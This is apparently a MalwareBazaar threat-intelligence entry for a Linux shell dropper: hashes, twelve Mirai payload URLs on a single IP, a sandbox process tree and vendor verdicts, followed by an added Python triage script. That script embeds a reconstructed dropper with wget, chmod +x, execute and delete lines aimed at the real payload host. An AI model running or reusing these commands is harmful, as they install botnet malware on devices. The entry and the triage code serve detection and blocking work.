MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat: unknown


Vendor detections: 6



SHA256 hash: a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a
SHA3-384 hash: 791bdd82e0e21ee9a326b81689f5cc5e8409cb562f1114312024c56d3118434c10bbc19c5dc5b2db268a9dee0440019c
SHA1 hash: d1e4940d5c4c2f3054498a49a22e613d15eb0356
MD5 hash: 6ec73c36203fbaec8cc4f2bc98108122
humanhash: magazine-magnesium-hydrogen-idaho
File name: wget.sh
File size: 822 bytes
First seen: 2025-11-21 22:14:46 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 12:S4yXhJ4y2YN4y3NIl5e4yc0LKu4ym+OFS4yjjMa4y9Ttj54yCSOZY4yLtr4yEa4c:rYVNI7iKv+Isj1T5Ul0tYiPn
TLSH: T167011EDE663562629584CF34706644A89178FBD0B27C8B2AFDC51CB3C4D9B01322EF6D
Magika: shell
Reporter: abuse_ch
Tags: sh
IOCs: URLs referenced by this sample and the payloads served from them (all twelve are fetched from 31.97.147.189:80, the host seen in the sandbox behavior graph)

URL                                  | Malware sample (SHA256 hash)                                     | Signature | Tags
http://31.97.147.189/systemcl/arm    | be58a44667b375703a76ad0c6ddca15d16aee9717d125919f20dce30763cc00e | Mirai     | 32-bit elf mirai Mozi
http://31.97.147.189/systemcl/arm5   | 58979f8f088f4a7ccb290972f63908b9f2aed2745965edec68713c3cd48288dd | Mirai     | arm elf geofenced mirai ua-wget USA
http://31.97.147.189/systemcl/arm6   | cda60790407bccd1f7e11f6b1ec2f299a5348392a1abfdfddaeae28e42bd284f | Mirai     | arm elf geofenced mirai ua-wget USA
http://31.97.147.189/systemcl/arm7   | 7dd8c3fe8594bd26a06d0df7438b4c06356b02767c5f246bcca9380549452261 | Mirai     | arm elf geofenced mirai ua-wget USA
http://31.97.147.189/systemcl/m68k   | ee69d2f047fb8bd98d96d1ff4fb41f5dbea8aa91d81b60819542c8de7eb80a62 | Mirai     | elf geofenced m68k mirai ua-wget USA
http://31.97.147.189/systemcl/mips   | b38cac7dcd0b2f68f15499113658d15987de22ba225cea00a14e95a885adec75 | Mirai     | 32-bit elf mirai Mozi
http://31.97.147.189/systemcl/mpsl   | 6bcd18e09bdddc9823c1ebc6090640ed723eddb8d214958ee99d607da2e6d86b | Mirai     | elf geofenced mips mirai ua-wget USA
http://31.97.147.189/systemcl/ppc    | 55bdaa3a8a9608985b07865783259092d37736f52066f94df42f2a4c9820b026 | Mirai     | elf geofenced mirai PowerPC ua-wget USA
http://31.97.147.189/systemcl/sh4    | 6d1e8f244ece4575dd4fa0e405b758ba2bf4b265cdf25eda7084d2d7bd3d1a83 | Mirai     | elf mirai ua-wget
http://31.97.147.189/systemcl/spc    | ab43916d8e693e404bcb5f0c732139dfae5b3e122a4ad12b6b97d35639cb7749 | Mirai     | elf mirai ua-wget
http://31.97.147.189/systemcl/x86    | 5b1f2a4aae9074691cb6f36abffe7c155844f670b8fcf1c9106ca60201217bf3 | Mirai     | 32-bit elf mirai Mozi
http://31.97.147.189/systemcl/x86_64 | 970d48b9edbe3f7877701b695eec9e47f7f64409a951de973b4e40e72e0da785 | Mirai     | elf geofenced mirai ua-wget USA x86

Intelligence

File Origin
# of uploads: 1
# of downloads: 34
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive mirai

Verdict: Malicious
File Type: text
First seen: 2025-11-21T08:34:00Z UTC
Last seen: 2025-11-21T21:46:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (summary of the rendered process tree; the graph image itself is not reproduced here):
  /usr/bin/sudo (pid 3095) execve /tmp/sample.bin (pid 3102), the script under analysis
  /tmp/sample.bin execve /usr/bin/wget 12 times (pids 3104, 3152, 3184, 3203, 3228, 3254, 3278, 3335, 3358, 3386, 3416, 3540); each sends 140 to 143 bytes to 31.97.147.189:80, the host serving the URLs in the IOC list; all but pids 3358 and 3386 are also flagged write-file
  /tmp/sample.bin execve /usr/bin/chmod 12 times (pids 3146, 3181, 3198, 3225, 3250, 3275, 3328, 3355, 3383, 3413, 3464, 3562)
  /tmp/sample.bin clone /usr/bin/dash 10 times (pids 3148, 3182, 3200, 3226, 3251, 3276, 3330, 3356, 3385, 3415)
  /tmp/sample.bin execve /home/sandbox/x86 (pid 3465, net) and /home/sandbox/x86_64 (pid 3564, net); only the two payloads matching the sandbox host architecture run
  /home/sandbox/x86 (pid 3465) connects to 8.8.8.8:53 and clones pids 3538 and 3539; pid 3539 (dns, net, send-data, zombie) sends 42 B to 8.8.8.8:53 and 41 B to ahahahahahajs.unproxy.st:9772
  /home/sandbox/x86_64 (pid 3564) connects to 8.8.8.8:53 and clones pids 3620 (zombie) and 3621; pid 3621 (dns, net, send-data, zombie) sends 42 B to 8.8.8.8:53 and 46 B to ahahahahahajs.unproxy.st:9772
  /tmp/sample.bin execve /usr/bin/rm (pid 3622, delete-file) at the end of the run
Threat name: Linux.Trojan.Vigorf
Status: Malicious
First seen: 2025-11-21 13:29:22 UTC
File Type: Text (Shell)
AV detection: 19 of 38 (50.00%)
Threat level: 5/5
Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
(The first two behaviour strings name Windows-only mechanisms, the registry and SetWindowsHookEx, yet are reported for a Linux shell script; treat them as generic heuristic labels from that vendor, not as behaviour observed from this sample.)

Please note that we are no longer able to provide a coverage score for Virus Total.
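The IOC list and the sandbox graph above describe the same thing from two sides: a shell script that fetches one Mirai payload per CPU architecture from 31.97.147.189, marks it executable, runs it, and finally deletes the files. The following static-triage script is an added example, not the wget.sh sample and not MalwareBazaar's code. SAMPLE_SCRIPT is constructed to mirror that chain (wget, chmod, ./name, rm) and the twelve payload URLs listed under IOCs; the real 822-byte wget.sh is not reproduced, and the `systemcl` argument, the `cd` fallback line and the `-O` spelling on one line are assumptions. The ARCH_LABELS set, the three-architecture threshold and the `triage` verdict are this example's own heuristics.

```python
"""Static triage of a Mirai-style multi-architecture downloader script.

Added example, not the MalwareBazaar sample: SAMPLE_SCRIPT is CONSTRUCTED
to mirror the wget -> chmod -> execute -> rm chain in the sandbox graph and
the twelve payload URLs in the IOC list. The real wget.sh is not reproduced.
"""
import re
from urllib.parse import urlparse

SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://31.97.147.189/systemcl/arm; chmod +x arm; ./arm systemcl
wget http://31.97.147.189/systemcl/arm5; chmod +x arm5; ./arm5 systemcl
wget http://31.97.147.189/systemcl/arm6; chmod +x arm6; ./arm6 systemcl
wget http://31.97.147.189/systemcl/arm7; chmod +x arm7; ./arm7 systemcl
wget http://31.97.147.189/systemcl/m68k; chmod +x m68k; ./m68k systemcl
wget http://31.97.147.189/systemcl/mips; chmod +x mips; ./mips systemcl
wget http://31.97.147.189/systemcl/mpsl; chmod +x mpsl; ./mpsl systemcl
wget http://31.97.147.189/systemcl/ppc; chmod +x ppc; ./ppc systemcl
wget http://31.97.147.189/systemcl/sh4; chmod +x sh4; ./sh4 systemcl
wget -O spc http://31.97.147.189/systemcl/spc; chmod +x spc; ./spc systemcl
wget http://31.97.147.189/systemcl/x86; chmod +x x86; ./x86 systemcl
wget http://31.97.147.189/systemcl/x86_64; chmod +x x86_64; ./x86_64 systemcl
rm -rf arm arm5 arm6 arm7 m68k mips mpsl ppc sh4 spc x86 x86_64
"""

# Payload names Mirai-family droppers commonly use, one per CPU architecture
# (assumed list; extend it for other campaigns).
ARCH_LABELS = {"arm", "arm5", "arm6", "arm7", "m68k", "mips", "mpsl", "ppc",
               "sh4", "spc", "x86", "x86_64", "i586", "i686", "arc"}
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
URL_RE = re.compile(r"https?://[^\s;'\"|&]+")


def split_commands(script):
    """Split into simple commands on newlines, ';', '&&', '||'; drop comment lines."""
    commands = []
    for line in script.splitlines():
        if line.lstrip().startswith("#"):
            continue
        for part in re.split(r"\s*(?:;|&&|\|\|)\s*", line):
            if part.strip():
                commands.append(part.strip())
    return commands


def extract_downloads(commands):
    """One record per URL fetched by wget/curl. The on-disk label is taken from
    'wget -O NAME' / 'curl -o NAME' when present, else from the URL's last path part."""
    records = []
    for cmd in commands:
        argv = cmd.split()
        if argv[0] not in ("wget", "curl"):
            continue
        out_flag = "-O" if argv[0] == "wget" else "-o"   # curl -O means "remote name"
        out_name = None
        if out_flag in argv and argv.index(out_flag) + 1 < len(argv):
            out_name = argv[argv.index(out_flag) + 1]
        for url in URL_RE.findall(cmd):
            parsed = urlparse(url)
            records.append({
                "url": url,
                "host": parsed.hostname,
                "port": parsed.port or (443 if parsed.scheme == "https" else 80),
                "path": parsed.path,
                "label": out_name or parsed.path.rsplit("/", 1)[-1],
            })
    return records


def chain_stages(commands):
    """Count the download -> chmod -> execute (./name) -> rm stages."""
    stages = {"download": 0, "chmod": 0, "execute": 0, "delete": 0}
    executed = set()
    for cmd in commands:
        head = cmd.split()[0]
        if head in DOWNLOADERS:
            stages["download"] += 1
        elif head == "chmod":
            stages["chmod"] += 1
        elif head == "rm":
            stages["delete"] += 1
        elif head.startswith("./"):
            stages["execute"] += 1
            executed.add(head[2:])
    return stages, executed


def triage(script):
    """Summarise network IOCs and flag a multi-arch downloader: at least three
    architecture-named payloads plus chmod and execute stages (heuristic)."""
    commands = split_commands(script)
    downloads = extract_downloads(commands)
    stages, executed = chain_stages(commands)
    archs = sorted({d["label"] for d in downloads} & ARCH_LABELS)
    verdict = len(archs) >= 3 and stages["chmod"] > 0 and stages["execute"] > 0
    return {
        "downloads": downloads,
        "hosts": sorted({d["host"] for d in downloads}),
        "host_ports": sorted({f'{d["host"]}:{d["port"]}' for d in downloads}),
        "archs": archs,
        "executed": sorted(executed),
        "stages": stages,
        "multi_arch_downloader": verdict,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print(result["host_ports"], result["archs"], result["stages"], result["multi_arch_downloader"])
```

Run on the constructed script it reports a single host:port (31.97.147.189:80), twelve architecture labels, twelve download/chmod/execute stages and one delete, and flags the script as a multi-arch downloader; the extracted host:port and URL list are what you would feed into egress blocking or a proxy log search. The sandbox graph explains why a host only ever executes two of the twelve payloads: the others fail at exec on a mismatched architecture, which is exactly why the dropper tries all of them.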

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
sh  a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a  (this sample)

Delivery method: Distributed via web download

Comments